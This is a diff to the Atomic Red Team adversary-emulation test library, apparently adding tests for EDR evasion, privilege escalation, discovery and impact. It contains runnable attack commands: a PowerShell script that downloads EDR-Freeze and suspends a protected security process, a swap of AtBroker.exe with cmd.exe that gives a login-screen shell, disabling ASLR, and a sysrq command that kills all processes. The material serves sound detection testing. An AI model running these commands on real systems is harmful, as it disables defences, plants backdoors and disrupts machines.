+          in the comma\" -ForegroundColor Yellow\nStart-Sleep -Seconds 2\n\n# Put
+          targeted  process in the comma for 15s\n# Discover the EDR-Freeze executable
+          dynamically (pick most recent if multiple)\n$edrFreezeExeName = Get-ChildItem
+          -Path $scriptFolder -Filter 'EDR-Freeze_*.exe' -ErrorAction SilentlyContinue
+          |\n    Sort-Object LastWriteTime -Descending |\n    Select-Object -First
+          1 -ExpandProperty Name\nif (-not $edrFreezeExeName) {\n    Write-Host \"No
+          EDR-Freeze executable (EDR-Freeze_*.exe) found in $scriptFolder\" -ForegroundColor
+          Red\n    exit 1\n}\n\n$edrFreezeExe = Join-Path $scriptFolder $edrFreezeExeName\nWrite-Host
+          \"Using EDR-Freeze executable: $edrFreezeExeName\" -ForegroundColor Cyan\nWrite-Host
+          \"$processName putted in the comma for 15s, by targetting Process ID $($htaProcess.Id)\"
+          -ForegroundColor Yellow\nStart-Process -FilePath $edrFreezeExe -ArgumentList
+          (\"$($process.Id) 15000\") | Out-Null"
+        cleanup_command: |-
+          Remove-Item -Path $edrFreezeExe -Force -erroraction silentlycontinue
+          Write-Output "File deleted: $edrFreezeExe"
+        name: powershell
+        elevation_required: true
+    - name: Disable ASLR Via sysctl parameters - Linux
+      auto_generated_guid: ac333fe1-ce2b-400b-a117-538634427439
+      description: Detects Execution of the `sysctl` command to set `kernel.randomize_va_space=0`
+        which disables Address Space Layout Randomization (ASLR) in Linux.
+      supported_platforms:
+      - linux
+      executor:
+        command: 'sysctl -w kernel.randomize_va_space=0
+
+          '
+        cleanup_command: 'sysctl -w kernel.randomize_va_space=2
+
+          '
+        name: bash
+        elevation_required: true
  T1601:
    technique:
      type: attack-pattern
@@ -27916,9 +28037,9 @@ defense-evasion:
        command: |
          aws logs create-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json
          echo "*** Log Group Created ***"
-          aws logs create-log-stream --log-group-name #{cloudwatch_log_group_name} --log-stream-name #{cloudwatch_log_stream_name}
+          aws logs create-log-stream --log-group-name #{cloudwatch_log_group_name} --log-stream-name #{cloudwatch_log_stream_name} --region #{region}
          echo "*** Log Stream Created ***"
-          aws logs delete-log-stream --log-group-name #{cloudwatch_log_group_name} --log-stream-name #{cloudwatch_log_stream_name}
+          aws logs delete-log-stream --log-group-name #{cloudwatch_log_group_name} --log-stream-name #{cloudwatch_log_stream_name} --region #{region}
          echo "*** Log Stream Deleted ***"
          aws logs delete-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json
          echo "*** Log Group Deleted ***"
@@ -42009,6 +42130,27 @@ privilege-escalation:
          '
        name: command_prompt
        elevation_required: true
+    - name: Replace AtBroker.exe (App Switcher binary) with cmd.exe
+      auto_generated_guid: 210be7ea-d841-40ec-b3e1-ff610bb62744
+      description: 'Replace AtBroker.exe (App Switcher binary) with cmd.exe. This
+        allows the user to launch an elevated command prompt from the login screen
+        by locking and then unlocking the computer after toggling on any of the accessibility
+        tools in the Accessibility menu.
+
+        '
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          IF NOT EXIST C:\Windows\System32\AtBroker_backup.exe (copy C:\Windows\System32\AtBroker.exe C:\Windows\System32\AtBroker_backup.exe) ELSE ( pushd )
+          takeown /F C:\Windows\System32\AtBroker.exe /A
+          icacls C:\Windows\System32\AtBroker.exe /grant Administrators:F /t
+          copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\AtBroker.exe
+        cleanup_command: 'copy /Y C:\Windows\System32\AtBroker_backup.exe C:\Windows\System32\AtBroker.exe
+
+          '
+        name: command_prompt
+        elevation_required: true
  T1055.004:
    technique:
      type: attack-pattern
@@ -68307,6 +68449,27 @@ persistence:
          '
        name: command_prompt
        elevation_required: true
+    - name: Replace AtBroker.exe (App Switcher binary) with cmd.exe
+      auto_generated_guid: 210be7ea-d841-40ec-b3e1-ff610bb62744
+      description: 'Replace AtBroker.exe (App Switcher binary) with cmd.exe. This
+        allows the user to launch an elevated command prompt from the login screen
+        by locking and then unlocking the computer after toggling on any of the accessibility
+        tools in the Accessibility menu.
+
+        '
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          IF NOT EXIST C:\Windows\System32\AtBroker_backup.exe (copy C:\Windows\System32\AtBroker.exe C:\Windows\System32\AtBroker_backup.exe) ELSE ( pushd )
+          takeown /F C:\Windows\System32\AtBroker.exe /A
+          icacls C:\Windows\System32\AtBroker.exe /grant Administrators:F /t
+          copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\AtBroker.exe
+        cleanup_command: 'copy /Y C:\Windows\System32\AtBroker_backup.exe C:\Windows\System32\AtBroker.exe
+
+          '
+        name: command_prompt
+        elevation_required: true
  T1136.002:
    technique:
      type: attack-pattern
@@ -109694,6 +109857,18 @@ discovery:
          '
        name: command_prompt
        elevation_required: false
+    - name: Identifying Network Shares - Linux
+      auto_generated_guid: 361fe49d-0c19-46ec-a483-ccb92d38e88e
+      description: |
+        If the system uses network file systems (e.g., NFS, CIFS), findmnt can help locate paths to remote shares.
+        Attackers may then attempt to access these shares for lateral movement or data exfiltration.
+      supported_platforms:
+      - linux
+      executor:
+        command: 'findmnt -t nfs
+
+          '
+        name: sh
  T1049:
    technique:
      type: attack-pattern
@@ -119923,6 +120098,21 @@ impact:
          '
        name: sh
        elevation_required: true
+    - name: Abuse of linux magic system request key for Send a SIGTERM to all processes
+      auto_generated_guid: 6e76f56f-2373-4a6c-a63f-98b7b72761f1
+      description: 'Adversaries with root or sufficient privileges Send a SIGTERM
+        to all processes, except for init. By writing ''e'' to /proc/sysrq-trigger,
+        they can forced kill all processes, except for init.
+
+        '
+      supported_platforms:
+      - linux
+      executor:
+        command: 'echo "e" > /proc/sysrq-trigger
+
+          '
+        name: bash
+        elevation_required: true
  T1499.004:
    technique:
      type: attack-pattern
@@ -120636,9 +120826,9 @@ impact:
              - notepad.exe launched with a ransom-themed text file
              - creation of a ransom-themed text file in %TEMP%
            NON-DESTRUCTIVE Atomic Red Team test.
+      dependency_executor_name: command_prompt
      dependencies:
      - description: Notepad must be present on the system
-        dependency_executor_name: command_prompt
        prereq_command: where notepad
        get_prereq_command: ''
      executor:
@@ -12820,6 +12820,21 @@ defense-evasion:
          | Set-AdvancedSetting -Value '0' -Confirm:$false\nDisconnect-VIServer -Confirm:$false\n"
        name: powershell
        elevation_required: true
+    - name: Disable ASLR Via sysctl parameters - Linux
+      auto_generated_guid: ac333fe1-ce2b-400b-a117-538634427439
+      description: Detects Execution of the `sysctl` command to set `kernel.randomize_va_space=0`
+        which disables Address Space Layout Randomization (ASLR) in Linux.
+      supported_platforms:
+      - linux
+      executor:
+        command: 'sysctl -w kernel.randomize_va_space=0
+
+          '
+        cleanup_command: 'sysctl -w kernel.randomize_va_space=2
+
+          '
+        name: bash
+        elevation_required: true
  T1601:
    technique:
      type: attack-pattern
@@ -62945,6 +62960,18 @@ discovery:
          find . -type f -name ".*"
        cleanup_command: 'rm #{output_file}'
        name: sh
+    - name: Identifying Network Shares - Linux
+      auto_generated_guid: 361fe49d-0c19-46ec-a483-ccb92d38e88e
+      description: |
+        If the system uses network file systems (e.g., NFS, CIFS), findmnt can help locate paths to remote shares.
+        Attackers may then attempt to access these shares for lateral movement or data exfiltration.
+      supported_platforms:
+      - linux
+      executor:
+        command: 'findmnt -t nfs
+
+          '
+        name: sh
  T1049:
    technique:
      type: attack-pattern
@@ -71053,6 +71080,21 @@ impact:
          '
        name: sh
        elevation_required: true
+    - name: Abuse of linux magic system request key for Send a SIGTERM to all processes
+      auto_generated_guid: 6e76f56f-2373-4a6c-a63f-98b7b72761f1
+      description: 'Adversaries with root or sufficient privileges Send a SIGTERM
+        to all processes, except for init. By writing ''e'' to /proc/sysrq-trigger,
+        they can forced kill all processes, except for init.
+
+        '
+      supported_platforms:
+      - linux
+      executor:
+        command: 'echo "e" > /proc/sysrq-trigger
+
+          '
+        name: bash
+        elevation_required: true
  T1499.004:
    technique:
      type: attack-pattern
@@ -19493,6 +19493,112 @@ defense-evasion:
          -Name Enabled -Value 1 -PropertyType "DWord" -Force
        name: powershell
        elevation_required: true
+    - name: Freeze PPL-protected process with EDR-Freeze
+      auto_generated_guid: cbb2573a-a6ad-4c87-aef8-6e175598559b
+      description: This test utilizes the tool EDR-Freeze, which leverages the native
+        Microsoft binary WerFaultSecure.exe to suspend processes protected by the
+        Protected Process Light mechanism. PPL is a Windows security feature designed
+        to safeguard critical system processes — such as those related to antivirus,
+        credential protection, and system integrity — from tampering or inspection.
+        These processes operate in a restricted environment that prevents access even
+        from administrators or debugging tools, unless the accessing tool is signed
+        and trusted by Microsoft. By using WerFaultSecure.exe, which is inherently
+        trusted by the operating system, EDR-Freeze is able to bypass these restrictions
+        and temporarily freeze PPL-protected processes for analysis or testing purposes.
+      supported_platforms:
+      - windows
+      input_arguments:
+        processName:
+          type: string
+          default: SecurityHealthService
+          description: PPL-protected process name to target
+      executor:
+        command: "# Enable SeDebugPrivilege\nAdd-Type -TypeDefinition @\"\nusing System;\nusing
+          System.Runtime.InteropServices;\n\npublic class TokenAdjuster {\n    [DllImport(\"advapi32.dll\",
+          SetLastError = true)]\n    public static extern bool OpenProcessToken(IntPtr
+          ProcessHandle, uint DesiredAccess, out IntPtr TokenHandle);\n\n    [DllImport(\"advapi32.dll\",
+          SetLastError = true)]\n    public static extern bool LookupPrivilegeValue(string
+          lpSystemName, string lpName, out long lpLuid);\n\n    [DllImport(\"advapi32.dll\",
+          SetLastError = true)]\n    public static extern bool AdjustTokenPrivileges(IntPtr
+          TokenHandle, bool DisableAllPrivileges,\n        ref TOKEN_PRIVILEGES NewState,
+          uint BufferLength, IntPtr PreviousState, IntPtr ReturnLength);\n\n    [StructLayout(LayoutKind.Sequential,
+          Pack = 1)]\n    public struct TOKEN_PRIVILEGES {\n        public int PrivilegeCount;\n
+          \       public long Luid;\n        public int Attributes;\n    }\n\n    public
+          const int SE_PRIVILEGE_ENABLED = 0x00000002;\n    public const uint TOKEN_ADJUST_PRIVILEGES
+          = 0x0020;\n    public const uint TOKEN_QUERY = 0x0008;\n\n    public static
+          bool EnableSeDebugPrivilege() {\n        IntPtr hToken;\n        if (!OpenProcessToken(System.Diagnostics.Process.GetCurrentProcess().Handle,
+          TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, out hToken))\n            return
+          false;\n\n        long luid;\n        if (!LookupPrivilegeValue(null, \"SeDebugPrivilege\",
+          out luid))\n            return false;\n\n        TOKEN_PRIVILEGES tp = new
+          TOKEN_PRIVILEGES();\n        tp.PrivilegeCount = 1;\n        tp.Luid = luid;\n
+          \       tp.Attributes = SE_PRIVILEGE_ENABLED;\n\n        return AdjustTokenPrivileges(hToken,
+          false, ref tp, 0, IntPtr.Zero, IntPtr.Zero);\n    }\n}\n\"@\n\n$result =
+          [TokenAdjuster]::EnableSeDebugPrivilege()\nif ($result) {\n    Write-Host
+          \"SeDebugPrivilege enabled successfully.\" -ForegroundColor Green\n} else
+          {\n    Write-Host \"Failed to enable SeDebugPrivilege.\" -ForegroundColor
+          Red\n    exit 1\n}\n\n# Get basic process info\n$process = Get-Process -Name
+          $#{processName} -ErrorAction Stop\n$processName = $process.ProcessName\nWrite-Host
+          \"Process Name: $processName)\"\nWrite-Host \"PID: $($process.Id)\"\n        \n#
+          Get executable path and user info\n$query = \"SELECT * FROM Win32_Process
+          WHERE Name = '$processName.exe'\"\n$wmiProcess = Get-WmiObject -Query $query\n\n$owner
+          = $wmiProcess.GetOwner()\n    Write-Host \"User: $($owner.Domain)\\$($owner.User)\"\n\n\n#
+          Get the folder of the current script\n$scriptFolder = Split-Path -Parent
+          $MyInvocation.MyCommand.Definition\n\n# Download latest EDR-Freeze package
+          and extract (force replace)\n$downloadUrl = \"https://github.com/TwoSevenOneT/EDR-Freeze/releases/download/main/EDR-Freeze_1.0.zip\"\n$zipPath
+          = Join-Path $scriptFolder \"EDR-Freeze_1.0.zip\"\nWrite-Host \"Downloading
+          latest EDR-Freeze from $downloadUrl\" -ForegroundColor Cyan\ntry {\n    Invoke-WebRequest
+          -Uri $downloadUrl -OutFile $zipPath -UseBasicParsing -ErrorAction Stop\n
+          \   Write-Host \"Download completed: $zipPath\" -ForegroundColor Green\n
+          \   $extractFolder = $scriptFolder\n    if (Test-Path $zipPath) {\n        Write-Host
+          \"Extracting archive to $extractFolder (overwriting existing files)\" -ForegroundColor
+          Cyan\n        if (Test-Path $extractFolder) {\n            # Ensure target
+          exe not locked; attempt to stop any running instance silently\n            Get-Process
+          -Name \"EDR-Freeze_1.0\" -ErrorAction SilentlyContinue | Stop-Process -Force
+          -ErrorAction SilentlyContinue\n        }\n        Add-Type -AssemblyName
+          System.IO.Compression.FileSystem 2>$null\n        # Custom extraction routine
+          (overwrite existing) compatible with .NET Framework (no bool overwrite overload)\n
+          \       $archive = $null\n        try {\n            $archive = [System.IO.Compression.ZipFile]::OpenRead($zipPath)\n
+          \           foreach ($entry in $archive.Entries) {\n                if ([string]::IsNullOrWhiteSpace($entry.FullName))
+          { continue }\n                if ($entry.FullName.EndsWith('/')) { # directory
+          entry\n                    $dirPath = Join-Path $extractFolder $entry.FullName\n
+          \                   if (-not (Test-Path $dirPath)) { New-Item -ItemType
+          Directory -Path $dirPath -Force | Out-Null }\n                    continue\n
+          \               }\n                $destPath = Join-Path $extractFolder
+          $entry.FullName\n                $destDir = Split-Path $destPath -Parent\n
+          \               if (-not (Test-Path $destDir)) { New-Item -ItemType Directory
+          -Path $destDir -Force | Out-Null }\n                if (Test-Path $destPath)
+          { Remove-Item -Path $destPath -Force -ErrorAction SilentlyContinue }\n                try
+          {\n                    # Use static extension method (PowerShell 5.1 compatible)\n
+          \                   [System.IO.Compression.ZipFileExtensions]::ExtractToFile($entry,
+          $destPath, $false)\n                } catch {\n                    Write-Host
+          \"Failed to extract entry $($entry.FullName): $_\" -ForegroundColor Yellow\n
+          \               }\n            }\n            Write-Host \"Extraction completed.\"
+          -ForegroundColor Green\n        } finally {\n            if ($archive) {
+          $archive.Dispose() }\n        }\n    }\n} catch {\n    Write-Host \"Failed
+          to download or extract EDR-Freeze: $_\" -ForegroundColor Red\n}\n\n# Wait
+          15s before putting targeted process before putting it in the comma\nWrite-Host
+          \"Waiting 15s before putting $processName in the comma\" -ForegroundColor
+          Yellow\nStart-Sleep -Seconds 5\nWrite-Host \"Waiting 10s before putting
+          $processName in the comma\" -ForegroundColor Yellow\nStart-Sleep -Seconds
+          5\nWrite-Host \"Waiting 5s before putting $processName in the comma\" -ForegroundColor
+          Yellow\nStart-Sleep -Seconds 3\nWrite-Host \"Waiting 2s before putting $processName
+          in the comma\" -ForegroundColor Yellow\nStart-Sleep -Seconds 2\n\n# Put
+          targeted  process in the comma for 15s\n# Discover the EDR-Freeze executable
+          dynamically (pick most recent if multiple)\n$edrFreezeExeName = Get-ChildItem
+          -Path $scriptFolder -Filter 'EDR-Freeze_*.exe' -ErrorAction SilentlyContinue
+          |\n    Sort-Object LastWriteTime -Descending |\n    Select-Object -First
+          1 -ExpandProperty Name\nif (-not $edrFreezeExeName) {\n    Write-Host \"No
+          EDR-Freeze executable (EDR-Freeze_*.exe) found in $scriptFolder\" -ForegroundColor
+          Red\n    exit 1\n}\n\n$edrFreezeExe = Join-Path $scriptFolder $edrFreezeExeName\nWrite-Host
+          \"Using EDR-Freeze executable: $edrFreezeExeName\" -ForegroundColor Cyan\nWrite-Host
+          \"$processName putted in the comma for 15s, by targetting Process ID $($htaProcess.Id)\"
+          -ForegroundColor Yellow\nStart-Process -FilePath $edrFreezeExe -ArgumentList
+          (\"$($process.Id) 15000\") | Out-Null"
+        cleanup_command: |-
+          Remove-Item -Path $edrFreezeExe -Force -erroraction silentlycontinue
+          Write-Output "File deleted: $edrFreezeExe"
+        name: powershell
+        elevation_required: true
  T1601:
    technique:
      type: attack-pattern
@@ -35016,6 +35122,27 @@ privilege-escalation:
          '
        name: command_prompt
        elevation_required: true
+    - name: Replace AtBroker.exe (App Switcher binary) with cmd.exe
+      auto_generated_guid: 210be7ea-d841-40ec-b3e1-ff610bb62744
+      description: 'Replace AtBroker.exe (App Switcher binary) with cmd.exe. This
+        allows the user to launch an elevated command prompt from the login screen
+        by locking and then unlocking the computer after toggling on any of the accessibility
+        tools in the Accessibility menu.
+
+        '
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          IF NOT EXIST C:\Windows\System32\AtBroker_backup.exe (copy C:\Windows\System32\AtBroker.exe C:\Windows\System32\AtBroker_backup.exe) ELSE ( pushd )
+          takeown /F C:\Windows\System32\AtBroker.exe /A
+          icacls C:\Windows\System32\AtBroker.exe /grant Administrators:F /t
+          copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\AtBroker.exe
+        cleanup_command: 'copy /Y C:\Windows\System32\AtBroker_backup.exe C:\Windows\System32\AtBroker.exe
+
+          '
+        name: command_prompt
+        elevation_required: true
  T1055.004:
    technique:
      type: attack-pattern
@@ -57100,6 +57227,27 @@ persistence:
          '
        name: command_prompt
        elevation_required: true
+    - name: Replace AtBroker.exe (App Switcher binary) with cmd.exe
+      auto_generated_guid: 210be7ea-d841-40ec-b3e1-ff610bb62744
+      description: 'Replace AtBroker.exe (App Switcher binary) with cmd.exe. This
+        allows the user to launch an elevated command prompt from the login screen
+        by locking and then unlocking the computer after toggling on any of the accessibility
+        tools in the Accessibility menu.
+
+        '
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          IF NOT EXIST C:\Windows\System32\AtBroker_backup.exe (copy C:\Windows\System32\AtBroker.exe C:\Windows\System32\AtBroker_backup.exe) ELSE ( pushd )
+          takeown /F C:\Windows\System32\AtBroker.exe /A
+          icacls C:\Windows\System32\AtBroker.exe /grant Administrators:F /t
+          copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\AtBroker.exe
+        cleanup_command: 'copy /Y C:\Windows\System32\AtBroker_backup.exe C:\Windows\System32\AtBroker.exe
+
+          '
+        name: command_prompt
+        elevation_required: true
  T1136.002:
    technique:
      type: attack-pattern
@@ -99731,9 +99879,9 @@ impact:
              - notepad.exe launched with a ransom-themed text file
              - creation of a ransom-themed text file in %TEMP%
            NON-DESTRUCTIVE Atomic Red Team test.
+      dependency_executor_name: command_prompt
      dependencies:
      - description: Notepad must be present on the system
-        dependency_executor_name: command_prompt
        prereq_command: where notepad
        get_prereq_command: ''
      executor:
@@ -26,6 +26,8 @@ Some files and directories may require elevated or specific user permissions to

 - [Atomic Test #7 - ESXi - Enumerate VMDKs available on an ESXi Host](#atomic-test-7---esxi---enumerate-vmdks-available-on-an-esxi-host)

+- [Atomic Test #8 - Identifying Network Shares - Linux](#atomic-test-8---identifying-network-shares---linux)
+

 <br/>

@@ -344,4 +346,33 @@ Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -O



+<br/>
+<br/>
+
+## Atomic Test #8 - Identifying Network Shares - Linux
+If the system uses network file systems (e.g., NFS, CIFS), findmnt can help locate paths to remote shares.
+Attackers may then attempt to access these shares for lateral movement or data exfiltration.
+
+**Supported Platforms:** Linux
+
+
+**auto_generated_guid:** 361fe49d-0c19-46ec-a483-ccb92d38e88e
+
+
+
+
+
+
+#### Attack Commands: Run with `sh`! 
+
+
+```sh
+findmnt -t nfs
+```
+
+
+
+
+
+
 <br/>
@@ -191,3 +191,14 @@ atomic_tests:
       echo "" | "#{plink_file}" "#{vm_host}" -ssh  -l "#{vm_user}" -pw "#{vm_pass}" -m "#{cli_script}"
    name: command_prompt
    elevation_required: false
+- name: Identifying Network Shares - Linux
+  auto_generated_guid: 361fe49d-0c19-46ec-a483-ccb92d38e88e
+  description: |
+    If the system uses network file systems (e.g., NFS, CIFS), findmnt can help locate paths to remote shares.
+    Attackers may then attempt to access these shares for lateral movement or data exfiltration.
+  supported_platforms:
+  - linux
+  executor:
+    command: |
+      findmnt -t nfs
+    name: sh
@@ -24,6 +24,8 @@ Adversaries may accomplish this by disabling individual services of high importa

 - [Atomic Test #7 - Linux - Stop service by killing process using pkill](#atomic-test-7---linux---stop-service-by-killing-process-using-pkill)

+- [Atomic Test #8 - Abuse of linux magic system request key for Send a SIGTERM to all processes](#atomic-test-8---abuse-of-linux-magic-system-request-key-for-send-a-sigterm-to-all-processes)
+

 <br/>

@@ -299,4 +301,32 @@ sudo systemctl start #{service_name} 2> /dev/null



+<br/>
+<br/>
+
+## Atomic Test #8 - Abuse of linux magic system request key for Send a SIGTERM to all processes
+Adversaries with root or sufficient privileges Send a SIGTERM to all processes, except for init. By writing 'e' to /proc/sysrq-trigger, they can forced kill all processes, except for init.
+
+**Supported Platforms:** Linux
+
+
+**auto_generated_guid:** 6e76f56f-2373-4a6c-a63f-98b7b72761f1
+
+
+
+
+
+
+#### Attack Commands: Run with `bash`!  Elevation Required (e.g. root or admin) 
+
+
+```bash
+echo "e" > /proc/sysrq-trigger
+```
+
+
+
+
+
+
 <br/>
@@ -153,3 +153,14 @@ atomic_tests:
      sudo systemctl start #{service_name} 2> /dev/null
    name: sh
    elevation_required: true
+- name: Abuse of linux magic system request key for Send a SIGTERM to all processes
+  auto_generated_guid: 6e76f56f-2373-4a6c-a63f-98b7b72761f1
+  description: |
+    Adversaries with root or sufficient privileges Send a SIGTERM to all processes, except for init. By writing 'e' to /proc/sysrq-trigger, they can forced kill all processes, except for init.
+  supported_platforms:
+  - linux
+  executor:
+    command: |
+      echo "e" > /proc/sysrq-trigger
+    name: bash
+    elevation_required: true
@@ -289,14 +289,14 @@ catch {



-#### Dependencies:  Run with `powershell`!
+#### Dependencies:  Run with `command_prompt`!
 ##### Description: Notepad must be present on the system
 ##### Check Prereq Commands:
-```powershell
+```cmd
 where notepad
 ```
 ##### Get Prereq Commands:
-```powershell
+```cmd

 ```

@@ -184,9 +184,9 @@ atomic_tests:
          - notepad.exe launched with a ransom-themed text file
          - creation of a ransom-themed text file in %TEMP%
        NON-DESTRUCTIVE Atomic Red Team test.
+  dependency_executor_name: command_prompt
  dependencies:
    - description: Notepad must be present on the system
-      dependency_executor_name: command_prompt
      prereq_command: "where notepad"
      get_prereq_command: ""
  executor:
@@ -40,6 +40,8 @@ Other accessibility features exist that may also be leveraged in a similar fashi

 - [Atomic Test #9 - Replace DisplaySwitch.exe (Display Switcher binary) with cmd.exe](#atomic-test-9---replace-displayswitchexe-display-switcher-binary-with-cmdexe)

+- [Atomic Test #10 - Replace AtBroker.exe (App Switcher binary) with cmd.exe](#atomic-test-10---replace-atbrokerexe-app-switcher-binary-with-cmdexe)
+

 <br/>

@@ -390,4 +392,39 @@ copy /Y C:\Windows\System32\DisplaySwitch_backup.exe C:\Windows\System32\Display



+<br/>
+<br/>
+
+## Atomic Test #10 - Replace AtBroker.exe (App Switcher binary) with cmd.exe
+Replace AtBroker.exe (App Switcher binary) with cmd.exe. This allows the user to launch an elevated command prompt from the login screen by locking and then unlocking the computer after toggling on any of the accessibility tools in the Accessibility menu.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 210be7ea-d841-40ec-b3e1-ff610bb62744
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+IF NOT EXIST C:\Windows\System32\AtBroker_backup.exe (copy C:\Windows\System32\AtBroker.exe C:\Windows\System32\AtBroker_backup.exe) ELSE ( pushd )
+takeown /F C:\Windows\System32\AtBroker.exe /A
+icacls C:\Windows\System32\AtBroker.exe /grant Administrators:F /t
+copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\AtBroker.exe
+```
+
+#### Cleanup Commands:
+```cmd
+copy /Y C:\Windows\System32\AtBroker_backup.exe C:\Windows\System32\AtBroker.exe
+```
+
+
+
+
+
 <br/>
@@ -185,3 +185,19 @@ atomic_tests:
      copy /Y C:\Windows\System32\DisplaySwitch_backup.exe C:\Windows\System32\DisplaySwitch.exe
    name: command_prompt
    elevation_required: true
+- name: Replace AtBroker.exe (App Switcher binary) with cmd.exe
+  auto_generated_guid: 210be7ea-d841-40ec-b3e1-ff610bb62744
+  description: |
+    Replace AtBroker.exe (App Switcher binary) with cmd.exe. This allows the user to launch an elevated command prompt from the login screen by locking and then unlocking the computer after toggling on any of the accessibility tools in the Accessibility menu.
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      IF NOT EXIST C:\Windows\System32\AtBroker_backup.exe (copy C:\Windows\System32\AtBroker.exe C:\Windows\System32\AtBroker_backup.exe) ELSE ( pushd )
+      takeown /F C:\Windows\System32\AtBroker.exe /A
+      icacls C:\Windows\System32\AtBroker.exe /grant Administrators:F /t
+      copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\AtBroker.exe
+    cleanup_command: |
+      copy /Y C:\Windows\System32\AtBroker_backup.exe C:\Windows\System32\AtBroker.exe
+    name: command_prompt
+    elevation_required: true
@@ -14,6 +14,5 @@ atomic_tests:
      default: myapp.app
  executor:
    command: |
-      sudo xattr -d com.apple.quarantine #{app_path}
-    elevation_required: true
+      xattr -d com.apple.quarantine #{app_path}
    name: sh
@@ -134,6 +134,10 @@ Additionally, adversaries may exploit legitimate drivers from anti-virus softwar

 - [Atomic Test #57 - Disable EventLog-Application ETW Provider Via Registry - PowerShell](#atomic-test-57---disable-eventlog-application-etw-provider-via-registry---powershell)

+- [Atomic Test #58 - Freeze PPL-protected process with EDR-Freeze](#atomic-test-58---freeze-ppl-protected-process-with-edr-freeze)
+
+- [Atomic Test #59 - Disable ASLR Via sysctl parameters - Linux](#atomic-test-59---disable-aslr-via-sysctl-parameters---linux)
+

 <br/>

@@ -2436,4 +2440,214 @@ New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\WMI\Autologger\Ev



+<br/>
+<br/>
+
+## Atomic Test #58 - Freeze PPL-protected process with EDR-Freeze
+This test utilizes the tool EDR-Freeze, which leverages the native Microsoft binary WerFaultSecure.exe to suspend processes protected by the Protected Process Light mechanism. PPL is a Windows security feature designed to safeguard critical system processes — such as those related to antivirus, credential protection, and system integrity — from tampering or inspection. These processes operate in a restricted environment that prevents access even from administrators or debugging tools, unless the accessing tool is signed and trusted by Microsoft. By using WerFaultSecure.exe, which is inherently trusted by the operating system, EDR-Freeze is able to bypass these restrictions and temporarily freeze PPL-protected processes for analysis or testing purposes.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** cbb2573a-a6ad-4c87-aef8-6e175598559b
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| processName | PPL-protected process name to target | string | SecurityHealthService|
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+# Enable SeDebugPrivilege
+Add-Type -TypeDefinition @"
+using System;
+using System.Runtime.InteropServices;
+
+public class TokenAdjuster {
+    [DllImport("advapi32.dll", SetLastError = true)]
+    public static extern bool OpenProcessToken(IntPtr ProcessHandle, uint DesiredAccess, out IntPtr TokenHandle);
+
+    [DllImport("advapi32.dll", SetLastError = true)]
+    public static extern bool LookupPrivilegeValue(string lpSystemName, string lpName, out long lpLuid);
+
+    [DllImport("advapi32.dll", SetLastError = true)]
+    public static extern bool AdjustTokenPrivileges(IntPtr TokenHandle, bool DisableAllPrivileges,
+        ref TOKEN_PRIVILEGES NewState, uint BufferLength, IntPtr PreviousState, IntPtr ReturnLength);
+
+    [StructLayout(LayoutKind.Sequential, Pack = 1)]
+    public struct TOKEN_PRIVILEGES {
+        public int PrivilegeCount;
+        public long Luid;
+        public int Attributes;
+    }
+
+    public const int SE_PRIVILEGE_ENABLED = 0x00000002;
+    public const uint TOKEN_ADJUST_PRIVILEGES = 0x0020;
+    public const uint TOKEN_QUERY = 0x0008;
+
+    public static bool EnableSeDebugPrivilege() {
+        IntPtr hToken;
+        if (!OpenProcessToken(System.Diagnostics.Process.GetCurrentProcess().Handle, TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, out hToken))
+            return false;
+
+        long luid;
+        if (!LookupPrivilegeValue(null, "SeDebugPrivilege", out luid))
+            return false;
+
+        TOKEN_PRIVILEGES tp = new TOKEN_PRIVILEGES();
+        tp.PrivilegeCount = 1;
+        tp.Luid = luid;
+        tp.Attributes = SE_PRIVILEGE_ENABLED;
+
+        return AdjustTokenPrivileges(hToken, false, ref tp, 0, IntPtr.Zero, IntPtr.Zero);
+    }
+}
+"@
+
+$result = [TokenAdjuster]::EnableSeDebugPrivilege()
+if ($result) {
+    Write-Host "SeDebugPrivilege enabled successfully." -ForegroundColor Green
+} else {
+    Write-Host "Failed to enable SeDebugPrivilege." -ForegroundColor Red
+    exit 1
+}
+
+# Get basic process info
+$process = Get-Process -Name $#{processName} -ErrorAction Stop
+$processName = $process.ProcessName
+Write-Host "Process Name: $processName)"
+Write-Host "PID: $($process.Id)"
+        
+# Get executable path and user info
+$query = "SELECT * FROM Win32_Process WHERE Name = '$processName.exe'"
+$wmiProcess = Get-WmiObject -Query $query
+
+$owner = $wmiProcess.GetOwner()
+    Write-Host "User: $($owner.Domain)\$($owner.User)"
+
+
+# Get the folder of the current script
+$scriptFolder = Split-Path -Parent $MyInvocation.MyCommand.Definition
+
+# Download latest EDR-Freeze package and extract (force replace)
+$downloadUrl = "https://github.com/TwoSevenOneT/EDR-Freeze/releases/download/main/EDR-Freeze_1.0.zip"
+$zipPath = Join-Path $scriptFolder "EDR-Freeze_1.0.zip"
+Write-Host "Downloading latest EDR-Freeze from $downloadUrl" -ForegroundColor Cyan
+try {
+    Invoke-WebRequest -Uri $downloadUrl -OutFile $zipPath -UseBasicParsing -ErrorAction Stop
+    Write-Host "Download completed: $zipPath" -ForegroundColor Green
+    $extractFolder = $scriptFolder
+    if (Test-Path $zipPath) {
+        Write-Host "Extracting archive to $extractFolder (overwriting existing files)" -ForegroundColor Cyan
